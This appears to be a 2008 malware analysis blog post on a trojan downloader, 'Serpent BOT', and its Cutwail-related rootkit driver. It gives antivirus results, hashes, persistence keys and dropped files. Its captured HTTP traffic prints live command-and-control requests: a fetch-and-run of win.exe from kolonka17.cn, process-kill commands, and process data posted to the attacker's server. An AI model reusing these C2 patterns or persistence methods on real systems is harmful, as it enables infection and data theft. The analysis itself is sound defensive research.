Serpent BOT (Web Based Malware)
Steve sent me another sample of malware he found, but this time, we found a Web Based Malware with a web-interface:
The file that established connections with the website was named load.exe and below there is the report of the scan:
Report Generated 22.11.2008 at 23.15.36 (GMT 1)
Filename: load.exe
File size: 27 KB
MD5 Hash: 97A860C202A8016E08818F3AA90525B8
SHA1 Hash: CADF466ABD29CD993DD81EC838282589D0077BAC
CRC32: 89416946
Application Type: Executable (EXE) 32bit
Packer detected: Microsoft Visual C++ 6.0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 23 on 23
Antivirus Result
a-squared Trojan-Downloader.Agent!IK
Avira AntiVir TR/Dldr.Agent.agl
Avast Win32:Small-JMK [Trj] (0)
AVG Trojan horse Downloader.Zlob.12.R
BitDefender Trojan.Crypt.AI
ClamAV Worm.Socks-11
Comodo TrojWare.Win32.PSW.Agent.NHG
Dr.Web Trojan.PWS.Pace
Ewido Downloader.Agent.llo
F-PROT 6 W32/Socks.A.gen!Eldorado (generic, not disinfectable)
G DATA Trojan-Downloader.Win32.Agent.llo A
IkarusT3 Trojan-Downloader.Agent
Kaspersky Trojan-Downloader.Win32.Agent.llo
McAfee BackDoor-DRW trojan
MHR (Malware Hash Registry) Virus Found – detect rate 75%
NOD32 v3 Win32/PSW.Agent.NHG trojan
Norman Trojan W32/Agent.EXZF ()
QuickHeal TrojanDownloader.Agent.llo
Solo Antivirus Infection TrojanDropper.Win32.Small.Bgx
Sophos Troj/Dloadr-BMT
TrendMicro WORM_SOCKS.BL
VBA32 Trojan-Downloader.Win32.Agent.llo
VirusBuster Trojan.DL.Agent.ETEH
When I executed this load.exe file, a lot of traffic was established with this domain:
1 | kolonka17.cn |
Internet traffic:
1 2 3 | GET /loader/?&v=ver&s=9988 HTTP/1.1 User-Agent: _ Host: kolonka17.cn |
With the traffic below, another executable file named win.exe will be downloaded and executed in my system:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | GET /loader/manda.php?id=-695459345&v=ver&s=9988 HTTP/1.1 User-Agent: _ Host: kolonka17.cn Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf HTTP/1.1 200 OK Server: Apache/2 Content-length: 29 hxxp://kolonka17.cn/win.exe|5 GET /win.exe HTTP/1.1 User-Agent: _ Host: kolonka17.cn Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf |
Next we see new traffic to a new domain, where it sends a lot of encrypted data:
1 2 3 4 5 6 7 8 9 10 11 12 | GET /40E8001431303134393536323335383537393339333234386C0000018D66000000007600000642EB00053085858585 HTTP/1.0 Host: 69.147.239.106 HTTP/1.0 200 OK Date: Sat, 22 Nov 2008 09:04:03 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9 Last-Modified: Sat, 22 Nov 2008 09:04:03 GMT Cache-Control: no-cache Content-Length: 107532 Connection: close Content-Type: application/octet-stream ... |
And below there is some interesting traffic:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | GET /loader/manda.php?id=-789987028&l=5&v=ver&s=9988 HTTP/1.1 User-Agent: _ Host: kolonka17.cn Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf HTTP/1.1 200 OK Date: Sat, 22 Nov 2008 14:00:06 GMT Server: Apache/2 Content-Length: 2 ok GET /loader/proc_kill HTTP/1.1 User-Agent: _ Host: kolonka17.cn Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf HTTP/1.1 200 OK Date: Sat, 22 Nov 2008 14:00:07 GMT Server: Apache/2 Last-Modified: Wed, 12 Nov 2008 09:23:38 GMT Content-Length: 185 Content-Type: text/plain regedit.exe msconfig.exe taskmgr.exe reg.exe taskkill.exe tskill.exe tasklist.exe infium.exe notepad.exe explorer.exe nod32kui.exe nod32kui.exe egui.exe egui.exe putty.exe |
The malware now gets the command to kill a list of processes on my system:
1 | GET /loader/proc_kill HTTP/1.1 |
But the malware will not stop at just killing the processes! The malware will also delete some important executable files of the system, such as:
1 | C:\WINDOWS\explorer.exe |
In the new traffic below we can see the malware received another command:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | GET /loader/proc_run HTTP/1.1 User-Agent: _ Host: kolonka17.cn Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf HTTP/1.1 200 OK Date: Sat, 22 Nov 2008 14:00:14 GMT Server: Apache/2 Content-Length: 30 Content-Type: text/plain none.exe taskmon.exe qip.exe GET /loader/proc_killsize HTTP/1.1 User-Agent: _ Host: kolonka17.cn Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf HTTP/1.1 200 OK Date: Sat, 22 Nov 2008 14:00:10 GMT Server: Apache/2 Content-Length: 40 Content-Type: text/plain tasklis2t.exe inf3ium.exe note4pad.exe |
And is always related to process killing. After, we sent new traffic to the domain:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | POST /loader/data.php?id=-789987028 HTTP/1.1 Host: kolonka17.cn Content-Type: application/x-www-form-urlencoded Content-length: 289 proc=[System Process] smss.exe csrss.exe winlogon.exe services.exe lsass.exe svchost.exe spoolsv.exe explorer.exe alg.exe wscntfy.exe ufo.exe load.exe 14B.tmp size=12800 0 0 0 108032 13312 14336 57856 13824 51200 27648 12800 HTTP/1.1 200 OK Date: Sat, 22 Nov 2008 14:00:22 GMT Content-Length: 0 Content-Type: text/html |
We can see the malware has sent some information related to the current running processes of my system !! But note we have also sent the size of each process ! This information can be used by future malware versions, maybe to create some evading-code or to detect certain processes “not much loved” by the malware.
Next we received some traffic in the SMTP (25) port:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | Protocol : TCP Local Address : 64.233.183.27 Local Port : 25 220 mx.google.com ESMTP k5si310246nfh.0 Protocol : TCP Local Address : 209.85.135.114 Local Port : 25 220 mx.google.com ESMTP n10si1763302mue.37 Protocol : TCP Local Address : 94.100.176.20 Local Port : 25 220 Mail.Ru ESMTP Protocol : TCP Local Address : 216.157.145.27 Local Port : 25 220 mail7.hsphere.cc ESMTP mail7.hsphere.cc; Sat Nov 22 09:20:00 2008 |
And a new driver is loaded by the malware:
1 | C:\WINDOWS\system32\drivers\Winkk44.sys |
Report of the scan:
Report Generated 22.11.2008 at 23.32.46 (GMT 1)
Filename: Winkk44.sys
File size: 32 KB
MD5 Hash: 286C4C43EFED1D81C59AA7BC70B83BD8
SHA1 Hash: 4D09AC6BE2808360697E7ECA71BEBF7CADFDE985
CRC32: 2495620378
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 7 on 24
Antivirus Result
a-squared Trojan-Dropper.Cutwail!IK
Avira AntiVir -
Avast -
AVG Virus found BackDoor.Ntrootkit
BitDefender Trojan.Dropper.Cutwail.D
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Trojan-Downloader.Win32.Mutant.aim A
IkarusT3 Trojan-Dropper.Cutwail
Kaspersky Trojan-Downloader.Win32.Mutant.aim
McAfee -
MHR (Malware Hash Registry) -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus Infection TrojanDownloader.Win32.Mutant.Aim
Sophos -
TrendMicro -
VBA32 -
VirusBuster -
Again a Trojan.Dropper.Cutwail.D !
Below there are some interested strings extracted from Winkk44.sys:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | winlogon.exe e:\0soft\loader\runtime3\objfre_wxp_x86\i386\runtime3.pdb EXERESOURCE \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WinCtrl32 Asynchronous Impersonate StartShell DLLName WLEventStartShell WinCtrl32.dll \SystemRoot\system32\WinCtrl32.dll ImagePath Start \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ \DosDevices\Rntm74 \Device\Rntm74 \SystemRoot\system32\drivers\ \FileSystem Winkk44.sys |
As we can see from the image below, this driver is auto-loaded when the Operating System boots in Safe Mode:
During the analysis, were not detected SSDT/Shadow SSDT Hooks, no Stealth Code, I get BSOD when trying to open certain Anti-Rootkit software, the file Winkk44_sys is protected from changing/modification/deletion and also the registry keys are protected from changing/modification/deletion.
Running processes that are visible with taskmanager:
Registry keys used by the malware to startup with Windows:
Service info:
These are the malware traces we can see from an HijackThis log:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | Running processes:
C:\WINDOWS\system32\drivers\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
O2 - BHO: pl - {B200799F-9538-403d-9A6E-36F5942EC540} - C:\WINDOWS\system32\fklame32.dll (file missing)
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKLM\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKCU\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\spool.exe (User 'SYSTEM')
O20 - Winlogon Notify: WinCtrl32 - C:\WINDOWS\SYSTEM32\WinCtrl32.dll
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\ctfmon.exe |
Below there is a small summary of the files created by the malware:
1 2 3 4 5 6 7 8 | C:\WINDOWS\system32\ctfmon.exe %User%\Local Settings\Application Data\spool.exe %User%\ftpdll.dll C:\WINDOWS\system32\WinCtrl32.dll C:\WINDOWS\system32\fklame32.dll C:\WINDOWS\system32\drivers\ctfmon.exe C:\WINDOWS\system32\drivers\Winkk44.sys C:\WINDOWS\system32\drivers\555.exe |
